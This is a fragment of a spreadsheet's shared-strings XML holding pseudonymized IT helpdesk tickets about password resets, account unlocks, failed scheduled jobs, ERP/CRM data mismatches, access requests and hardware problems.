  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xzjlkfvc.agfmpyhr@gmail.com_x000D_
_x000D_
hi,_x000D_
please reset my password and sending the password to log in._x000D_
well </t>
  </si>
  <si>
    <t>xzjlkfvc agfmpyhr</t>
  </si>
  <si>
    <t>create sso for qiyujevw ogadikxv</t>
  </si>
  <si>
    <t>create purchasingupstreamsso ad group for qiyujevw ogadikxv (wanrtygm3). the samaccountname in ad is to be all lower case.</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the user michthey olivgtyera id: olivgtyemc</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  email  in cell phone the user michthey olivgtyera id: olivgtyemc
</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1953d at 08/10/16 14:57:25</t>
  </si>
  <si>
    <t>dynamics crm advanced find ribbon issue</t>
  </si>
  <si>
    <t>the ribbon in advanced find is displaced making it difficult to query the system/create views. (see attached)</t>
  </si>
  <si>
    <t>when using phone, connection is intermittent.  cannot use desk phone for calls and skype meetings.</t>
  </si>
  <si>
    <t>my cell phone is 
other people at jc have complained about the same thing.</t>
  </si>
  <si>
    <t>aedwrpvo qbpafrsx</t>
  </si>
  <si>
    <t>wbecophk uwntkiar</t>
  </si>
  <si>
    <t>error in accessing reporting_engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">error in accessing reporting_engineering_tool_x000D_
_x000D_
bill, this would need to be a ticket.  gso â€“ please assign to the analytics technical team.  might be that the t account for magda is locked out; can republish using an analytics t account._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool - permition to sign in - include user id on cad users list </t>
  </si>
  <si>
    <t xml:space="preserve">i need have access on engineering tool, however when i tried do logon engineering tool show me te message that i had permission . 
please include my user id on cad user list. 
let me know if you need more information. 
contact phone: 
</t>
  </si>
  <si>
    <t>qdgcilzf cpzlmesa</t>
  </si>
  <si>
    <t>reset passwords for esias bosch using password_management_tool password reset.</t>
  </si>
  <si>
    <t>reporting_tool web link in crm not opening up</t>
  </si>
  <si>
    <t>sharepiont discount request error</t>
  </si>
  <si>
    <t xml:space="preserve">infopath cannot submit the form._x000D_
an error occurred while the form was being submitted._x000D_
the form cannot be submitted to the following location: _x000D_
the site may be offline, read-only, or otherwise unavailable._x000D_
access denied. before opening files in this location, you must first add the web site to your trusted sites list, browse to the web site, and select the option to login automatically._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>name:nxloukai cpbzkrel
language:
browser:microsoft internet explorer
email:nxloukai.cpbzkrel@gmail.com
customer number:
telephone:
summary:i need an update on my it ticket ticket_no1530185...this needs to be resolved aerp</t>
  </si>
  <si>
    <t>company center page does not load</t>
  </si>
  <si>
    <t>system login issue.</t>
  </si>
  <si>
    <t>netweaver not working</t>
  </si>
  <si>
    <t>netweaver not working
name:iauqlrjk nijdaukz
language:
browser:microsoft internet explorer
email:iauqlrjk.nijdaukz@gmail.com
customer number:
telephone:
summary:i am not able to open net weaver business client, i receive an error that microsoft .net framdntyework 4.5 is not installed and to contact my administrator.</t>
  </si>
  <si>
    <t>qualys scan for required server completion HostName_17-new</t>
  </si>
  <si>
    <t xml:space="preserve">category task owner_x000D_
documentation see attached server profile forms nvyjtmca xjhpznds_x000D_
global security create global groups and add the appropriate users security group_x000D_
local security implement local users/groups/security_tool kathght shfhyw_x000D_
monitoring add to reporting_tool monitoring/dac inventory erirtc baurhty/hoavdlwc ungksotp_x000D_
sep add server to sep management server akisjtzm uvbmysgcbenezer/kishore nikam_x000D_
sms/patching_antivirus_sw add server to sms/patching_antivirus_sw  shahid nawab_x000D_
security run qualsys scan gzhapcld fdigznbk / ugyothfz ugrmkdhx_x000D_
backup configure backup local/remote timnhyt rehtyulds/gdhyrts muggftyali _x000D_
</t>
  </si>
  <si>
    <t>shop_floor_app problems</t>
  </si>
  <si>
    <t xml:space="preserve">from: vldwtjgr vtzakpol _x000D_
sent: wednesday, august 10, 2016 8:27 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: dctvfjrn oypnxftq_x000D_
subject: amar re: shop_floor_app problems_x000D_
_x000D_
help desk,_x000D_
_x000D_
we are experiencing problems widtqkwzup vtkzuqly in the tinning cell. please assign the shop_floor_app support group to work on this issue. the operators are reporting that not all the production orders they are badging are posting. please let me know what further info you need from me._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vldwtjgr vtzakpol</t>
  </si>
  <si>
    <t>engineering_tool error</t>
  </si>
  <si>
    <t>password reset as its expired</t>
  </si>
  <si>
    <t>name:ivxybewh ykhsqvnu
language:
browser:microsoft internet explorer
email:ivxybewh.ykhsqvnu@gmail.com
customer number:
telephone:
summary:i need all of my passwords reset so i can log into my computer and into erp.</t>
  </si>
  <si>
    <t>ivxybewh ykhsqvnu</t>
  </si>
  <si>
    <t>vitalyst transfer: service unavailable on crm online</t>
  </si>
  <si>
    <t>hardware issue</t>
  </si>
  <si>
    <t>when user is trying to use a separate computer t install a software he's getting a message stating that windows cannot connect to the domain either because the domain controller is down or otherwise unavailable or because your computer account was not found. this computer needs to replace a dead pc in the shop floor and user need to install a software to make it up and running.</t>
  </si>
  <si>
    <t xml:space="preserve">call transferred to amfgtyartya for password </t>
  </si>
  <si>
    <t>trying to access collaboration_platform site</t>
  </si>
  <si>
    <t xml:space="preserve">
i'm trying to access this collaboration_platform site. i believe it was managed by bill gofgrthyuetz who left the company.  i requested access on 6/30/16 and haven't received a response.
</t>
  </si>
  <si>
    <t>dpvnhlmb anzhbtfy</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, my laptop's random shut down problem still exists. it now shows "no battery detected". </t>
  </si>
  <si>
    <t>hi team, my laptop's random shut down problem still exists. i lose important unsaved data because of it. it now shows "no battery detected". please replace battery or laptop or please rectify the issue as soon as possible.</t>
  </si>
  <si>
    <t>nwdlefxk epzrghnv</t>
  </si>
  <si>
    <t>tfrbwoua aegpkruc unable to print from pdf</t>
  </si>
  <si>
    <t xml:space="preserve">urgent: need full py access for all german locations </t>
  </si>
  <si>
    <t xml:space="preserve">hi,
could you please usa me full access + permissions for maintaining py data in erp for all german locations?
reference id can be mnakehrf mvunqihf or hess kagthrl-heyinz.
approval can be provided by jywvemun qngschtz.
</t>
  </si>
  <si>
    <t>couskjgd uzojtkmh</t>
  </si>
  <si>
    <t>increase the ramdnty from 80gb to 128 gb ramdnty for HostName_1045</t>
  </si>
  <si>
    <t>increase the ramdnty from 80gb to 128 gb ramdnty for HostName_1045 server</t>
  </si>
  <si>
    <t>reset password request for bobj</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: iqcylpok.ascpqvni@gmail.com
hello,
please reset my password for bobj in SID_37.  my user name is mcfgtydonn.  </t>
  </si>
  <si>
    <t>zip code entered into erp account in SID_34 does not synch with msd crm</t>
  </si>
  <si>
    <t xml:space="preserve">hello_x000D_
account 81548372, zip code was updated in erp SID_34, however it does not move to msd crm, the error says the post code is not valid. do we know in what format the postal code should be entered for israel? can you/elogic share the rules regarding postal code formats with lucindaÂ´s team, please?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>decommission of HostName_553-old</t>
  </si>
  <si>
    <t xml:space="preserve">from: zmgsfner caltmgoe _x000D_
sent: 15 july 2016 13:50_x000D_
to: sadghryioshkurtyar  hiremath &lt;dcbligso.mfhquljk@gmail.com&gt;_x000D_
cc: mfyivqes cpihaxbs &lt;mfyivqes.cpihaxbs@gmail.com&gt;_x000D_
subject: HostName_553-old_x000D_
_x000D_
hi_x000D_
_x000D_
you can remove the old HostName_553 from the domain now._x000D_
_x000D_
i have not needed to access it recently._x000D_
_x000D_
let me know when you are done and i will power it down and move into storage._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>password reset request from o365</t>
  </si>
  <si>
    <t>tlvcjdmk fbpvrqzh</t>
  </si>
  <si>
    <t>low disk space on lhqSID_1854 - f drive</t>
  </si>
  <si>
    <t xml:space="preserve">from: vwaliogd dviwuzhm 
sent: friday, august 5, 2016 8:07 pm
to: gdhyrts muggftyali  &lt;tvmuzqio.bhsmdxgz@gmail.com&gt;; sadghryioshkurtyar  hiremath &lt;dcbligso.mfhquljk@gmail.com&gt;
cc: stefyty parkeyhrt &lt;esntuago.kwxrdhuv@gmail.com&gt;; wyjsbzda yfeuhtib &lt;wyjsbzda.yfeuhtib@gmail.com&gt;
subject: low disk space on lhqSID_1854 - f drive
hi nagfghtyudra / sadghryiosh, 
i was checking my access to lhqSID_1854 for tomorrow's dot net application deployment and realized f: is running out of space with only 4kb free space. is this ok? if not, request your help to clear off any temporary files to free up some space.
adding stefyty parkeyhrt in cc if you need approvals to move over files between drives if required. 
</t>
  </si>
  <si>
    <t>t drive folder access</t>
  </si>
  <si>
    <t>zugriff auf verzeichnis angefragt.
folder access requested.
benutzer id ?
user id karagtfma
benutzer die position titel?
user's position title  manager commodities amerirtcas
verzeichnis? 
folder //HostName_768   all items under purchasing
art des zugriffs?
type of access ? (read only or full control) full control
name des vorgesetzten?
manager name?</t>
  </si>
  <si>
    <t>EU_tool funktioniert nicht.</t>
  </si>
  <si>
    <t>EU_tool funktioniert nicht._x000D_
meldung : unbekannten fehler . system distributor_tool fehler.</t>
  </si>
  <si>
    <t>telephony_software &lt; -- &gt;  erp</t>
  </si>
  <si>
    <t>the terms of payment are not in line between crm and erp_x000D_
_x000D_
customer 81800540     fredi stury ag                  ruemlang_x000D_
_x000D_
sales org. 1278_x000D_
crm-entry: 0008  2% 20 days net 40 days    _x000D_
erp-entry:  0027  2% 14 days net 30 days_x000D_
_x000D_
i suggested that both systems should reflect the same data._x000D_
_x000D_
according to the information received from repyzajo lxfwopyq it was requested by sales and approved by finance._x000D_
could you please change it back to 0027.</t>
  </si>
  <si>
    <t>password reset request for kiosk users.</t>
  </si>
  <si>
    <t>oprbatch extending plant views on fert items with missing/ incorrect settings.</t>
  </si>
  <si>
    <t xml:space="preserve">oprbatch extending plant views on fert items with missing/ incorrect settings.  mm 4994907 extended to plant_322 - missing abc, spt incorrect, and mrptype incorrect.  mm 5276470 extended to plant_341 - missing abc, spt incorrect, mrp type incorrect, delivery plant incorrect for sales org 1320.   mm 6065360 extended  to plant_9  - missing abc, spt incorrect, mrp type incorrect.  in addition, when oprbatch extends, price control is defaulted to v, depending on source it should be s and this always needs corrected manually.  </t>
  </si>
  <si>
    <t>mmaster sales org extensions created by oprbatch are creating errors in matgrp1 and material statistics</t>
  </si>
  <si>
    <t>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fields._x000D_
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t>
  </si>
  <si>
    <t>cannot use - net weaver business client 5.0</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uvoyrbhp.qbupdjhw@gmail.com_x000D_
_x000D_
dear sir,_x000D_
                   i cannot use net weaver business client 5.0. please support for this issue_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f333.8ea429e0]_x000D_
with warm </t>
  </si>
  <si>
    <t>uvoyrbhp qbupdjhw</t>
  </si>
  <si>
    <t>device replacement: setup new hp laserjet m575 mfp - replaces old ag65 - tel.: -328</t>
  </si>
  <si>
    <t xml:space="preserve">.netframdntyework 4.6.1 &amp; business_client 5.0 SID_792 deployment across amerirtcas (specific list of pc's) - 11th aug 2016 </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yqlvfkih.folbpugd@gmail.com_x000D_
_x000D_
dear folks,_x000D_
we have planned to deploy the dotnetframdntyework 4.6.1 &amp; business_client 5.0 SID_792 on the enclosed list of engineering_tool application installed pc's of amerirtcas region from thursday (11th aug) and also please ensure that all these users (as enclosed) are familiar with the package installation steps (type of package, installation duration, importance of the package, mode of the installation, times of reboot and installation behavior) through referring the below details._x000D_
_x000D_
note : this is to deploy only on 73 pc's of amerirtcas that has engineering_tool application installed (identified by engineering_tool application team â€“ prioritized list)_x000D_
_x000D_
package details :_x000D_
_x000D_
_x000D_
deployment date: - aug 11th  2016 - thursday_x000D_
_x000D_
_x000D_
_x000D_
time: - 9.00 am in the morning (as per the respective location time zone)_x000D_
_x000D_
_x000D_
_x000D_
deployment tool: - patching_antivirus_sw_x000D_
_x000D_
_x000D_
_x000D_
package type: - prompted. user will be prompted with prior notification to save all the work before proceeding the installation through clicking the continue button._x000D_
_x000D_
duration: - 10 - 15 minutes_x000D_
_x000D_
restart required: -  yes (prompt to restart after the installation of netframdntyework 4.6.1 &amp; business_client 5.0 SID_792)_x000D_
_x000D_
_x000D_
_x000D_
package behavior: - please go through the below provided bill bankrd and understand the importance of the package deployment ._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f328.7d792db0]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>laptop is having blue screen</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: afwzehqs.jfbxegac@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
after updating the erp, i am facing problem in oppening the attachments in erp quotes._x000D_
_x000D_
please resolve immidiately as this is causing problem for my regular activity._x000D_
_x000D_
[cid:image001.png@01d1f32d.b16020c0]_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>cannot access discounts through collaboration_platform</t>
  </si>
  <si>
    <t>engineering tool is getting locked out frequently.</t>
  </si>
  <si>
    <t>ewztnhig boixplft</t>
  </si>
  <si>
    <t>holiday list needs rebuilt</t>
  </si>
  <si>
    <t>someone has deleted all of the holiday entries from the holiday list on the hub.  there should be a backup in metavis that can be restored.  please restore the list/</t>
  </si>
  <si>
    <t>280_x000D_
summary:unable to login to outlook</t>
  </si>
  <si>
    <t>xhjmzyis bsduwrix</t>
  </si>
  <si>
    <t>business_client prompts related to java promts</t>
  </si>
  <si>
    <t>please refer attachments to this ticket for more informations.</t>
  </si>
  <si>
    <t>erp password reset request.</t>
  </si>
  <si>
    <t>hudrkqcg qyhkctrd</t>
  </si>
  <si>
    <t>setup new ws \thnsguzj utwijzag</t>
  </si>
  <si>
    <t>thnsguzj utwijzag</t>
  </si>
  <si>
    <t>setup new ws \yucgfmiq jamgpnqe</t>
  </si>
  <si>
    <t>yucgfmiq jamgpnqe</t>
  </si>
  <si>
    <t>setun new ws \michghytuael luesebrink</t>
  </si>
  <si>
    <t>wnicojsd evwplcxy</t>
  </si>
  <si>
    <t>setup new ws \uhammet kuluz</t>
  </si>
  <si>
    <t>dkrbwceu aiqkycwp</t>
  </si>
  <si>
    <t>install 64 bit version von ms office fÃ¼r pc 215502 im bÃ¼ro rohlings fertigung \njdrcagt shourxyp</t>
  </si>
  <si>
    <t>njdrcagt shourxyp</t>
  </si>
  <si>
    <t xml:space="preserve">report  /dscsag/dms_kpro_contv_clean1 is resulting in abap runtime error in SID_1 </t>
  </si>
  <si>
    <t>i tried to run the report /dscsag/dms_kpro_contv_clean1 in SID_1 through background job with the following inputs. but it resulted in abap runtime error shown below._x000D_
_x000D_
input variant: ugi_clean_x000D_
application: ugi_x000D_
quantity of inactive content versions: 3_x000D_
_x000D_
i have attached the screen shots of the same in the document._x000D_
_x000D_
we are working on this ticket :inc1535945 - plm content versions being generated without configuration. this report refers to this ticket.</t>
  </si>
  <si>
    <t>pldtreob fznbeusj</t>
  </si>
  <si>
    <t>forgot attendance_tool password</t>
  </si>
  <si>
    <t>teqkxlra vbinmucx</t>
  </si>
  <si>
    <t xml:space="preserve">outlock suche </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: giumxwvh.lfvwjtin@gmail.com_x000D_
_x000D_
hallo help-team,_x000D_
_x000D_
ich habe das problem, dass wenn ich nach versendeten emails suche Ã¼ber die suche nach namen kommt folgende fehlermeldung._x000D_
es kommen immer nur vorschlÃ¤ge bis zum 03.02.2016_x000D_
bitte prÃ¼fen und rÃ¼ckinfo._x000D_
vielen dank_x000D_
[cid:image002.jpg@01d1f2f7.35b19750]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen/ kind </t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_3182</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_3182 at 08/10/16 05:01:27</t>
  </si>
  <si>
    <t xml:space="preserve">outlook is not working </t>
  </si>
  <si>
    <t xml:space="preserve">reset password for erp SID_34 </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_593 at 08/10/16 04:25:28</t>
  </si>
  <si>
    <t>microsoft outlook2010 is not working for pdujfybc bvfdnale</t>
  </si>
  <si>
    <t xml:space="preserve">microsoft outlook2010 is not working for pdujfybc bvfdnale. pls. check pc edww8313043._x000D_
</t>
  </si>
  <si>
    <t>visio printer and wireless mouse</t>
  </si>
  <si>
    <t>help to configure the wireless device id04 printer and install the visio 2010 on the reimaged laptop.</t>
  </si>
  <si>
    <t>xezjvnyr hmjwknxs</t>
  </si>
  <si>
    <t>user called to give information regarding ticket_no0428784</t>
  </si>
  <si>
    <t>my account changed new password get many error in passwordmanage system .</t>
  </si>
  <si>
    <t>my account changed new password get many error in passwordmanage system . erp system password could not changed . my distributor_tool system -</t>
  </si>
  <si>
    <t>tpoweajk glvztyxp</t>
  </si>
  <si>
    <t>how do i change the "message server" when connecting to SID_1?_x000D_
_x000D_
i believe that it should be lhqx20330</t>
  </si>
  <si>
    <t>æ–‡ä»¶æ— æ³•æ‰“å°åˆ°æ‰“å°æœºï¼Œæç¤ºæ‰“å°æœºé”™è¯¯ã€‚</t>
  </si>
  <si>
    <t>prtSID_737--æ–‡ä»¶æ— æ³•æ‰“å°åˆ°æ‰“å°æœºï¼Œæç¤ºæ‰“å°æœºé”™è¯¯ã€‚</t>
  </si>
  <si>
    <t>fund</t>
  </si>
  <si>
    <t xml:space="preserve">hello ,_x000D_
_x000D_
below mail is definitely a spam mail. kindly take note of the same_x000D_
_x000D_
also if it is ok than forward this mail to all the employees to warn everyone._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">new prospect accounts created in crm do not get an erp number </t>
  </si>
  <si>
    <t xml:space="preserve">hello, _x000D_
_x000D_
i have two specific cases where a newly created prospect account in crm (modern construction and sandfield engineering) does not get an erp number, even after some days. after having run an advanced find search i found we have 385 such cases. please see attached file that describes the issue and the unique steps. _x000D_
_x000D_
if prospects do not get an erp id it results in the fact that they do not show up in the usersÂ´"my active prospects" view because it filters on prospects with erp id. users think that the account was not created and create the over and over again. we should review if we want to change the logic behind this view - i assume the filter was put in to exlude non-complete accounts. _x000D_
_x000D_
another issue i found during this troubleshooting process is i deactivated such a duplicate prospect and the audit log shows that 5 minutes later the account got activated again and got the erp number, too. please investigate this one too. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>quotation with configured new simple special items remains incomplete in SID_1</t>
  </si>
  <si>
    <t>quotation with configured new simple special items remains incomplete in SID_1:_x000D_
quotes were created in distributor_tool._x000D_
a) quote 3115968739 /11  - alternate mill_model item gets not replaced with material # of initial item 10._x000D_
b) quote 3115968742 / 10 and 11. pricing remains incomplete. i cannot identify what is actually incomplete. but erp shows the status incomplete and therefore the quote cannot be printed and sent to customer over web.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_587(germany,de-patching_antivirus_sw-production):is inactive since 8/4/2016 5:49 am est </t>
  </si>
  <si>
    <t>germany patching_antivirus_sw server. HostName_587 shows down since  8/8/2016 5:49 am est ._x000D_
kindly check.</t>
  </si>
  <si>
    <t>HostName_973(hr_tool tax_interface app - qa):average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)</t>
  </si>
  <si>
    <t>HostName_973(hr_tool tax_interface app - qa) : average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):  SID_21
enter user id of user having the issue: chopamghy
transaction code(s) the user needs or was working with: spro
describe the issue: need the access of spro transaction in SID_21
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user: milyhyakrp</t>
  </si>
  <si>
    <t xml:space="preserve">das passwort wurde meinerseits falsch eingegeben. bitte passwort zurÃ¼cksetzen (engineering tool und erp). danke_x000D_
</t>
  </si>
  <si>
    <t>ngcedtzy pfribotd</t>
  </si>
  <si>
    <t xml:space="preserve">while creating the order in distributor_tool inco and shipping conditions are coming wrong . </t>
  </si>
  <si>
    <t xml:space="preserve">rabhtui and all,_x000D_
_x000D_
it looks like me may still have a web issue.  the folks at the warehouse have seen some instances where the carrier has been a carrier tcode but the inco &amp; sc were cip &amp; 10 so kis is trying to change it to ups ground.  in one case it looks like the inco &amp; sc are pulling from the sold to &amp; the carrier is coming from the ship-to and in another it looks like the customer changed the carrier but was flat rate already because i didn't see that carrier option listed as a default on either the sold to or ship to_x000D_
_x000D_
here are the two examples from the warehouse._x000D_
_x000D_
delivery  sales order_x000D_
9168970934 35892003 (came over as cip 10 tfedp1nd)  sold-to is cip 10 tupsgrnd, ship-to is fca 04 tfedground w/ acct_x000D_
9168984363 35892687 (came over as cip 10 tfedground)   sold-to is cip 10 tupsgrnd, ship-to is fca 05 tups w/ acct_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_32 account locked </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc at 08/10/16 00:26:25</t>
  </si>
  <si>
    <t xml:space="preserve">enterprise scanner not working </t>
  </si>
  <si>
    <t>fplzydvo fwilgedx</t>
  </si>
  <si>
    <t>mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it acc</t>
  </si>
  <si>
    <t xml:space="preserve">from: grhryueg dewicrth _x000D_
sent: wednesday, august 10, 2016 6:22 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:fwd: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000D_
importance: high_x000D_
_x000D_
can you please unblock and usa access to my new phone?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">not getting any old mails in my outlook. kindly do the needful to restore the same. and help me store it in separate </t>
  </si>
  <si>
    <t>name:kargthythik
language:
browser:microsoft internet explorer
email:hjcpyxtq.okycpbsz@gmail.com
customer number:
telephone:
summary:i am not getting any old mails in my outlook. kindly do the needful to restore the same. and help me store it in separate location</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to vpn and reset password </t>
  </si>
  <si>
    <t>bex password was locked due to wrong typing. please reset the password</t>
  </si>
  <si>
    <t xml:space="preserve">name:zcqnuawo zxdtskpw
language:
browser:microsoft internet explorer
email:zcqnuawo.zxdtskpw@gmail.com
customer number:
telephone:
summary:bex password was locked due to wrong typing. please reset the password
</t>
  </si>
  <si>
    <t>email back problem in outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hjcpyxtq.okycpbsz@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i am not getting any old mails in my outlook. kindly do the needful to restore the same. and help me store it in separate location_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pc to be made as stand by own</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kzybxher.prjaswhe@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
pc number awyw8911438 should be made as stand by own it should not be connected to  network, as we are using it for cmm machine it require a separate pc. kindly do the needful._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_549</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_549 at 08/09/16 23:10:22</t>
  </si>
  <si>
    <t>cannot open engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: anpocezt.qturbxsg@gmail.com_x000D_
_x000D_
hello it_x000D_
when i try to open engineering_tool i get this, so i delete engineering_tool off my computer and then reinstalled it and i still get this_x000D_
</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_37hoti at 08/09/16 23:03:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_51hotf</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_51hotf at 08/09/16 23:03:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp at 08/09/16 23:03:27</t>
  </si>
  <si>
    <t>bex cannot convert to excel sheet</t>
  </si>
  <si>
    <t>domain account unlock</t>
  </si>
  <si>
    <t>i'm trying to help nkademwy ihsepkwz log into oneteam, to update his direct deposit information</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
ic_x000D_
welcome, our next available agent will be with you shortly..._x000D_
interaction alerting agent._x000D_
website visitor has joined the conversation_x000D_
rakthyesh ramdntythanjesh_x000D_
hello christgry, </t>
  </si>
  <si>
    <t>dmytraiq ixkuqyst</t>
  </si>
  <si>
    <t>unable to view screen on monitor when lid is closed</t>
  </si>
  <si>
    <t>å®¢æˆ·æä¾›çš„åœ¨çº¿ç³»ç»Ÿæ‰“ä¸å¼€</t>
  </si>
  <si>
    <t>å®¢æˆ·æä¾›çš„åœ¨çº¿é€è´§å•ç”Ÿæˆç³»ç»Ÿæ‰“ä¸å¼€ï¼Œéœ€å°½å¿«è§£å†³</t>
  </si>
  <si>
    <t>fupikdoa gjkytoeh</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1320 at 08/09/16 19:26:27</t>
  </si>
  <si>
    <t>SID_34/1108/vf01-vf04/ price problems zor agains zf2 inwarehouse_tool</t>
  </si>
  <si>
    <t xml:space="preserve">we have facing problems with the inwarehouse_tools , the price into the order is correct, but the inwarehouse_tool has another price!!!!_x000D_
example order confirmed 35881790 delivery 9168954879 inwarehouse_tool 0158914039_x000D_
example order confirmed 35882469 delivery 9168955759 inwarehouse_tool 0158915223_x000D_
i must issue the inwarehouse_tools 24 hours after the import payment. in this moment we stopped the process . </t>
  </si>
  <si>
    <t>cannot load finance_app</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pjxclyhs.fcniljtu@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
each time i select oracle enterprise from my bar, i get the following error:_x000D_
_x000D_
[cid:image001.png@01d1f26b.62be0da0]_x000D_
_x000D_
_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>employment status - employee termination for user: [dbsgicet xzopjhlq - vvgtyhpej]</t>
  </si>
  <si>
    <t>employee last name:  peghyurozich
employee first name:  jpsgeghtyui
employee number:2111114584
employee location: usa
manager's name: bwfhtumx japznrvb
employee's cost center: bdf001
employee self-service (ess) user only?
employee's last day of work:8/5/16
special instructions:</t>
  </si>
  <si>
    <t>reset passwords for nathyuasha smoltelephony_software using password_management_tool password reset.</t>
  </si>
  <si>
    <t>globalview (794, prtgghj4k) reset please!!!</t>
  </si>
  <si>
    <t>the snmp agent at '10.32.1.11' is not responding. [infoblox - usa datacenter primary dns]</t>
  </si>
  <si>
    <t xml:space="preserve"> Job_1953d:was running longer than 30 minutes kirtyled and rerun to successful completion.</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1953d at 08/09/16 16:52:27</t>
  </si>
  <si>
    <t>please unlock account  email  in cell phone the users rabkypet zocjdutp (id:fothrmijm) and ltmoubvy utrimobs (gomeshthyru)</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  email  in cell phone the users rabkypet zocjdutp (id:fothrmijm) and ltmoubvy utrimobs (gomeshthyru)
</t>
  </si>
  <si>
    <t>circuit outage: usa pa, plant comcast secondary circuit is down at  4:19 pm et on 09/08.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________ 4:19 pm et on 09/08.____________x000D_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_yes_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___na________    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ______yes_     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>excel continues to crash with 2-3 workbooks open</t>
  </si>
  <si>
    <t>error messages: "excel cannot complete the task with available resources.  choose less data or close other applications."  also "excel has stopped working".  and i have beshryued-out areas of my screen or distorted screens that don't refresh the excel view.  no pivot tables or complex macros in use.  only excel with outlook, skype &amp; powerpoint open.  laptop fan runs constantly in dock with excel in use.</t>
  </si>
  <si>
    <t>update dns on printer</t>
  </si>
  <si>
    <t>update dns on printer_x000D_
_x000D_
model - hp laser jet 4350dn_x000D_
dynamic ip address - _x000D_
fqdn: prtqi2019_x000D_
short name: SID_99_x000D_
print server: \\HostName_1332</t>
  </si>
  <si>
